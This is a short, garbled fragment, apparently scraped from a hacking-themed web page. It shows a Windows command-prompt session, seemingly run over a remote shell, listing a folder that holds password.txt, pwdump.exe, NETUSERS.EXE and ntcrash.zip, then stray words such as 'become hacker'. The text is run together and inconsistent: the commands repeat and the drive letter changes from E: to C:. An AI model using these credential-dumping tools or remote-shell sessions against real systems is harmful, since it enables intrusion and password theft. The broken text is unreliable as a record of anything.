(C) Copyright 1985-1999 Microsoft Corp.E:\ > cd testcd testE:\test > dir /wdir /wVolume in drive E has no label.Volume ****** Number is B465-452FDirectory of E:\test[.] [..] head.log NETUSERS.EXE NetView.exentcrash.zip password.txt pwdump.exe6 File(s) 262,499 bytes2 Dir(s) 191,488,000 bytes freeC:\test > exitexitsent 20, rcvd 450: NOTSOCK

Nh c

become hacker

Documents